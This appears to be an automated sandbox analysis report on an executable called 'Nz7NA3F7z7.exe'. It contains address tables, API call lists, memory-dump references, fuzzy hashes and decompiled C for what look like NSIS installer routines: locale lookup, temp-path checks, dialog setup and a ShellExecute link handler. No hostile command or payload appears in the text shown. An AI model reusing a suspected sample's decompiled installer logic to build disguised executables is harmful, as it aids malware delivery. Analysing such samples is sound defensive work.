                                                                                    0x00403bb0
                                                                                    0x00403b7d
                                                                                    0x00403b81
                                                                                    0x00403b86
                                                                                    0x00403b88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403b98
                                                                                    0x00403ba0
                                                                                    0x00000000
                                                                                    0x00403ba6
                                                                                    0x004039d4
                                                                                    0x004039d4
                                                                                    0x004039d8
                                                                                    0x004039dd
                                                                                    0x004039ec
                                                                                    0x004039ec
                                                                                    0x004039f5
                                                                                    0x004039fe
                                                                                    0x00403a09
                                                                                    0x00403a09
                                                                                    0x00403a15
                                                                                    0x00403a31
                                                                                    0x00403a34
                                                                                    0x00403a47
                                                                                    0x00403a4d
                                                                                    0x00403af0
                                                                                    0x00000000
                                                                                    0x00403af9
                                                                                    0x00403a53
                                                                                    0x00403a60
                                                                                    0x00403a62
                                                                                    0x00403a64
                                                                                    0x00403a83
                                                                                    0x00403a83
                                                                                    0x00403a86
                                                                                    0x00403a8b
                                                                                    0x00403a8e
                                                                                    0x00403a9e
                                                                                    0x00403a9f
                                                                                    0x00403aa1
                                                                                    0x00403ad7
                                                                                    0x00403aea
                                                                                    0x00000000
                                                                                    0x00403aea
                                                                                    0x00403aa3
                                                                                    0x00403aa9
                                                                                    0x00403ac2
                                                                                    0x00403ac7
                                                                                    0x00403ac9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403acb
                                                                                    0x00403ab7
                                                                                    0x00403ab7
                                                                                    0x00403ab9
                                                                                    0x00403ab9
                                                                                    0x00000000
                                                                                    0x00403ab9
                                                                                    0x00403aac
                                                                                    0x00403ab1
                                                                                    0x00000000
                                                                                    0x00403ab1
                                                                                    0x00403a90
                                                                                    0x00403a96
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a98
                                                                                    0x00000000
                                                                                    0x00403a98
                                                                                    0x00403a88
                                                                                    0x00000000
                                                                                    0x00403a88
                                                                                    0x00403a6e
                                                                                    0x00403a75
                                                                                    0x00403a7b
                                                                                    0x00403a7d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a7d
                                                                                    0x00403a39
                                                                                    0x00000000
                                                                                    0x00403a17
                                                                                    0x00403a1d
                                                                                    0x00403a27
                                                                                    0x00403e2d
                                                                                    0x00403e33
                                                                                    0x00403e40
                                                                                    0x00403e46
                                                                                    0x00403e46
                                                                                    0x00403e50
                                                                                    0x00000000
                                                                                    0x00403e50
                                                                                    0x00403a15

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                    • ShowWindow.USER32(?), ref: 00403A09
                                                                                    • DestroyWindow.USER32 ref: 00403A1D
                                                                                    • SetWindowLongA.USER32 ref: 00403A39
                                                                                    • GetDlgItem.USER32 ref: 00403A5A
                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                    • GetDlgItem.USER32 ref: 00403B23
                                                                                    • GetDlgItem.USER32 ref: 00403B2D
                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                    • GetDlgItem.USER32 ref: 00403C3E
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                    • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                    • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                    • EnableMenuItem.USER32 ref: 00403CA9
                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                    • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,0042E420), ref: 00403CFD
                                                                                    • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 184305955-0
                                                                                    • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                    • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                    • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                    • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E0040361A(void* __eflags) {
                                                                                    				intOrPtr _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				int _v12;
                                                                                    				int _v16;
                                                                                    				char _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t20;
                                                                                    				void* _t28;
                                                                                    				void* _t30;
                                                                                    				int _t31;
                                                                                    				void* _t34;
                                                                                    				int _t37;
                                                                                    				int _t38;
                                                                                    				int _t42;
                                                                                    				char _t62;
                                                                                    				CHAR* _t64;
                                                                                    				signed char _t68;
                                                                                    				CHAR* _t79;
                                                                                    				intOrPtr _t81;
                                                                                    				CHAR* _t85;
                                                                                    
                                                                                    				_t81 =  *0x42ec30;
                                                                                    				_t20 = E00405F57(3);
                                                                                    				_t88 = _t20;
                                                                                    				if(_t20 == 0) {
                                                                                    					_t79 = 0x42a0a0;
                                                                                    					"1033" = 0x7830;
                                                                                    					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
                                                                                    					__eflags =  *0x42a0a0;
                                                                                    					if(__eflags == 0) {
                                                                                    						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
                                                                                    					}
                                                                                    					lstrcatA("1033", _t79);
                                                                                    				} else {
                                                                                    					E00405B25("1033",  *_t20() & 0x0000ffff);
                                                                                    				}
                                                                                    				E004038E3(_t76, _t88);
                                                                                    				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                                    				 *0x42eca0 =  *0x42ec38 & 0x00000020;
                                                                                    				 *0x42ecbc = 0x10000;
                                                                                    				if(E0040579B(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                                                    					L16:
                                                                                    					if(E0040579B(_t96, _t84) == 0) {
                                                                                    						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                                                    					}
                                                                                    					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
                                                                                    					 *0x42e408 = _t28;
                                                                                    					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                                    						L21:
                                                                                    						if(E0040140B(0) == 0) {
                                                                                    							_t30 = E004038E3(_t76, __eflags);
                                                                                    							__eflags =  *0x42ecc0;
                                                                                    							if( *0x42ecc0 != 0) {
                                                                                    								_t31 = E00404F85(_t30, 0);
                                                                                    								__eflags = _t31;
                                                                                    								if(_t31 == 0) {
                                                                                    									E0040140B(1);
                                                                                    									goto L33;
                                                                                    								}
                                                                                    								__eflags =  *0x42e3ec;
                                                                                    								if( *0x42e3ec == 0) {
                                                                                    									E0040140B(2);
                                                                                    								}
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							ShowWindow( *0x42a078, 5);
                                                                                    							_t37 = E00405EE9("RichEd20");
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 == 0) {
                                                                                    								E00405EE9("RichEd32");
                                                                                    							}
                                                                                    							_t85 = "RichEdit20A";
                                                                                    							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
                                                                                    							__eflags = _t38;
                                                                                    							if(_t38 == 0) {
                                                                                    								GetClassInfoA(0, "RichEdit", 0x42e3c0);
                                                                                    								 *0x42e3e4 = _t85;
                                                                                    								RegisterClassA(0x42e3c0);
                                                                                    							}
                                                                                    							_t42 = DialogBoxParamA( *0x42ec20,  *0x42e400 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0);
                                                                                    							E0040356A(E0040140B(5), 1);
                                                                                    							return _t42;
                                                                                    						}
                                                                                    						L22:
                                                                                    						_t34 = 2;
                                                                                    						return _t34;
                                                                                    					} else {
                                                                                    						_t76 =  *0x42ec20;
                                                                                    						 *0x42e3d4 = _t28;
                                                                                    						_v20 = 0x624e5f;
                                                                                    						 *0x42e3c4 = E00401000;
                                                                                    						 *0x42e3d0 =  *0x42ec20;
                                                                                    						 *0x42e3e4 =  &_v20;
                                                                                    						if(RegisterClassA(0x42e3c0) == 0) {
                                                                                    							L33:
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    						_t12 =  &_v16; // 0x624e5f
                                                                                    						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                    						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
                                                                                    						goto L21;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t76 =  *(_t81 + 0x48);
                                                                                    					if(_t76 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					_t79 = 0x42dbc0;
                                                                                    					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x42ec58, 0x42dbc0, 0);
                                                                                    					_t62 =  *0x42dbc0; // 0x46
                                                                                    					if(_t62 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					if(_t62 == 0x22) {
                                                                                    						_t79 = 0x42dbc1;
                                                                                    						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
                                                                                    					}
                                                                                    					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                                    					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                                    						L15:
                                                                                    						E00405BC7(_t84, E004056BA(_t79));
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t68 = GetFileAttributesA(_t79);
                                                                                    						if(_t68 == 0xffffffff) {
                                                                                    							L14:
                                                                                    							E00405701(_t79);
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						_t96 = _t68 & 0x00000010;
                                                                                    						if((_t68 & 0x00000010) != 0) {
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    			}

























                                                                                    0x00403620
                                                                                    0x00403629
                                                                                    0x00403630
                                                                                    0x00403632
                                                                                    0x00403646
                                                                                    0x00403658
                                                                                    0x00403662
                                                                                    0x00403667
                                                                                    0x0040366d
                                                                                    0x00403680
                                                                                    0x00403680
                                                                                    0x0040368b
                                                                                    0x00403634
                                                                                    0x0040363f
                                                                                    0x0040363f
                                                                                    0x00403690
                                                                                    0x0040369a
                                                                                    0x004036a3
                                                                                    0x004036a8
                                                                                    0x004036b9
                                                                                    0x00403740
                                                                                    0x00403748
                                                                                    0x00403751
                                                                                    0x00403751
                                                                                    0x00403767
                                                                                    0x0040376d
                                                                                    0x0040377b
                                                                                    0x0040380a
                                                                                    0x00403812
                                                                                    0x0040381c
                                                                                    0x00403821
                                                                                    0x00403827
                                                                                    0x004038b1
                                                                                    0x004038b6
                                                                                    0x004038b8
                                                                                    0x004038d4
                                                                                    0x00000000
                                                                                    0x004038d4
                                                                                    0x004038ba
                                                                                    0x004038c0
                                                                                    0x004038c8
                                                                                    0x004038c8
                                                                                    0x00000000
                                                                                    0x004038c0
                                                                                    0x00403835
                                                                                    0x00403840
                                                                                    0x00403845
                                                                                    0x00403847
                                                                                    0x0040384e
                                                                                    0x0040384e
                                                                                    0x00403859
                                                                                    0x00403861
                                                                                    0x00403863
                                                                                    0x00403865
                                                                                    0x0040386e
                                                                                    0x00403871
                                                                                    0x00403877
                                                                                    0x00403877
                                                                                    0x00403896
                                                                                    0x004038a7
                                                                                    0x00000000
                                                                                    0x004038ac
                                                                                    0x00403814
                                                                                    0x00403816
                                                                                    0x00000000
                                                                                    0x00403781
                                                                                    0x00403781
                                                                                    0x00403787
                                                                                    0x00403791
                                                                                    0x00403799
                                                                                    0x004037a3
                                                                                    0x004037a9
                                                                                    0x004037b7
                                                                                    0x004038d9
                                                                                    0x004038d9
                                                                                    0x00000000
                                                                                    0x004038d9
                                                                                    0x004037bd
                                                                                    0x004037c6
                                                                                    0x00403805
                                                                                    0x00000000
                                                                                    0x00403805
                                                                                    0x004036bf
                                                                                    0x004036bf
                                                                                    0x004036c4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004036ce
                                                                                    0x004036de
                                                                                    0x004036e3
                                                                                    0x004036ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004036ee
                                                                                    0x004036f0
                                                                                    0x004036fd
                                                                                    0x004036fd
                                                                                    0x00403705
                                                                                    0x0040370b
                                                                                    0x00403733
                                                                                    0x0040373b
                                                                                    0x00000000
                                                                                    0x0040371d
                                                                                    0x0040371e
                                                                                    0x00403727
                                                                                    0x0040372d
                                                                                    0x0040372e
                                                                                    0x00000000
                                                                                    0x0040372e
                                                                                    0x00403729
                                                                                    0x0040372b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040372b
                                                                                    0x0040370b

                                                                                    APIs
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000), ref: 0040368B
                                                                                    • lstrlenA.KERNEL32(Fdskdfkdsfsdfdsf,?,?,?,Fdskdfkdsfsdfdsf,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                    • lstrcmpiA.KERNEL32(?,.exe,Fdskdfkdsfsdfdsf,?,?,?,Fdskdfkdsfsdfdsf,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                                                    • GetFileAttributesA.KERNEL32(Fdskdfkdsfsdfdsf), ref: 0040371E
                                                                                    • LoadImageA.USER32 ref: 00403767
                                                                                      • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                    • RegisterClassA.USER32 ref: 004037AE
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                    • CreateWindowExA.USER32 ref: 004037FF
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                    • GetClassInfoA.USER32 ref: 00403861
                                                                                    • GetClassInfoA.USER32 ref: 0040386E
                                                                                    • RegisterClassA.USER32 ref: 00403877
                                                                                    • DialogBoxParamA.USER32 ref: 00403896
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Fdskdfkdsfsdfdsf$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                    • API String ID: 1975747703-348240990
                                                                                    • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                    • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                    • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                    • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                    				char* _v8;
                                                                                    				signed int _v12;
                                                                                    				void* _v16;
                                                                                    				struct HWND__* _t52;
                                                                                    				long _t86;
                                                                                    				int _t98;
                                                                                    				struct HWND__* _t99;
                                                                                    				signed int _t100;
                                                                                    				intOrPtr _t109;
                                                                                    				int _t110;
                                                                                    				signed int* _t112;
                                                                                    				signed int _t113;
                                                                                    				char* _t114;
                                                                                    				CHAR* _t115;
                                                                                    
                                                                                    				if(_a8 != 0x110) {
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L11:
                                                                                    						if(_a8 != 0x4e) {
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								 *0x42a080 =  *0x42a080 + 1;
                                                                                    							}
                                                                                    							L25:
                                                                                    							_t110 = _a16;
                                                                                    							L26:
                                                                                    							return E00403EEA(_a8, _a12, _t110);
                                                                                    						}
                                                                                    						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                    						_t110 = _a16;
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                    							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                    							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                    							_v12 = _t100;
                                                                                    							_v16 = _t109;
                                                                                    							_v8 = 0x42dbc0;
                                                                                    							if(_t100 - _t109 < 0x800) {
                                                                                    								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                    								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                    								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                    								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                    								_t110 = _a16;
                                                                                    							}
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                    							goto L26;
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                    								SendMessageA( *0x42ec28, 0x111, 1, 0);
                                                                                    							}
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                    								SendMessageA( *0x42ec28, 0x10, 0, 0);
                                                                                    							}
                                                                                    							return 1;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
                                                                                    						goto L25;
                                                                                    					} else {
                                                                                    						_t112 =  *0x429870 + 0x14;
                                                                                    						if(( *_t112 & 0x00000020) == 0) {
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                    						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                    						E00404256();
                                                                                    						goto L11;
                                                                                    					}
                                                                                    				}
                                                                                    				_t98 = _a16;
                                                                                    				_t113 =  *(_t98 + 0x30);
                                                                                    				if(_t113 < 0) {
                                                                                    					_t113 =  *( *0x42e3fc - 4 + _t113 * 4);
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                    				_t114 = _t113 +  *0x42ec58;
                                                                                    				_push(0x22);
                                                                                    				_a16 =  *_t114;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_t115 = _t114 + 1;
                                                                                    				_v16 = _t115;
                                                                                    				_v8 = E00403F97;
                                                                                    				E00403E83(_a4);
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                    				_push(0x23);
                                                                                    				E00403E83(_a4);
                                                                                    				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                    				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                    				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                    				E00403EB8(_t99);
                                                                                    				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                    				_t86 =  *( *0x42ec30 + 0x68);
                                                                                    				if(_t86 < 0) {
                                                                                    					_t86 = GetSysColor( ~_t86);
                                                                                    				}
                                                                                    				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                    				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                    				 *0x429064 =  *0x429064 & 0x00000000;
                                                                                    				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                    				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                    				 *0x42a080 =  *0x42a080 & 0x00000000;
                                                                                    				return 0;
                                                                                    			}

















                                                                                    0x00403fdb
                                                                                    0x00404101
                                                                                    0x0040415d
                                                                                    0x00404161
                                                                                    0x00404238
                                                                                    0x0040423a
                                                                                    0x0040423a
                                                                                    0x00404240
                                                                                    0x00404240
                                                                                    0x00404243
                                                                                    0x00000000
                                                                                    0x0040424a
                                                                                    0x0040416f
                                                                                    0x00404171
                                                                                    0x0040417b
                                                                                    0x00404186
                                                                                    0x00404189
                                                                                    0x0040418c
                                                                                    0x00404197
                                                                                    0x0040419a
                                                                                    0x004041a1
                                                                                    0x004041af
                                                                                    0x004041c7
                                                                                    0x004041da
                                                                                    0x004041ea
                                                                                    0x004041ec
                                                                                    0x004041ec
                                                                                    0x004041a1
                                                                                    0x004041f6
                                                                                    0x00000000
                                                                                    0x00404201
                                                                                    0x00404205
                                                                                    0x00404216
                                                                                    0x00404216
                                                                                    0x0040421c
                                                                                    0x0040422a
                                                                                    0x0040422a
                                                                                    0x00000000
                                                                                    0x0040422e
                                                                                    0x004041f6
                                                                                    0x0040410c
                                                                                    0x00000000
                                                                                    0x00404120
                                                                                    0x00404126
                                                                                    0x0040412c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404151
                                                                                    0x00404153
                                                                                    0x00404158
                                                                                    0x00000000
                                                                                    0x00404158
                                                                                    0x0040410c
                                                                                    0x00403fe1
                                                                                    0x00403fe4
                                                                                    0x00403fe9
                                                                                    0x00403ffa
                                                                                    0x00403ffa
                                                                                    0x00404001
                                                                                    0x00404004
                                                                                    0x00404006
                                                                                    0x0040400b
                                                                                    0x00404014
                                                                                    0x0040401a
                                                                                    0x00404026
                                                                                    0x00404029
                                                                                    0x00404032
                                                                                    0x00404037
                                                                                    0x0040403a
                                                                                    0x0040403f
                                                                                    0x00404056
                                                                                    0x0040405d
                                                                                    0x00404070
                                                                                    0x00404073
                                                                                    0x00404088
                                                                                    0x0040408f
                                                                                    0x00404094
                                                                                    0x00404099
                                                                                    0x00404099
                                                                                    0x004040a8
                                                                                    0x004040b7
                                                                                    0x004040b9
                                                                                    0x004040cf
                                                                                    0x004040de
                                                                                    0x004040e0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32 ref: 00404056
                                                                                    • GetDlgItem.USER32 ref: 0040406A
                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                    • GetSysColor.USER32(?), ref: 00404099
                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                    • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                    • GetDlgItem.USER32 ref: 00404141
                                                                                    • SendMessageA.USER32(00000000), ref: 00404144
                                                                                    • GetDlgItem.USER32 ref: 0040416F
                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                    • LoadCursorA.USER32 ref: 004041BE
                                                                                    • SetCursor.USER32(00000000), ref: 004041C7
                                                                                    • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                    • LoadCursorA.USER32 ref: 004041E7
                                                                                    • SetCursor.USER32(00000000), ref: 004041EA
                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                    • String ID: Fdskdfkdsfsdfdsf$N$open
                                                                                    • API String ID: 3615053054-3313475987
                                                                                    • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                    • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                    • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                    • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				struct tagRECT _v32;
                                                                                    				struct tagPAINTSTRUCT _v96;
                                                                                    				struct HDC__* _t70;
                                                                                    				struct HBRUSH__* _t87;
                                                                                    				struct HFONT__* _t94;
                                                                                    				long _t102;
                                                                                    				signed int _t126;
                                                                                    				struct HDC__* _t128;
                                                                                    				intOrPtr _t130;
                                                                                    
                                                                                    				if(_a8 == 0xf) {
                                                                                    					_t130 =  *0x42ec30;
                                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                    					_a8 = _t70;
                                                                                    					GetClientRect(_a4,  &_v32);
                                                                                    					_t126 = _v32.bottom;
                                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                    					while(_v32.top < _t126) {
                                                                                    						_a12 = _t126 - _v32.top;
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                    						_t87 = CreateBrushIndirect( &_v16);
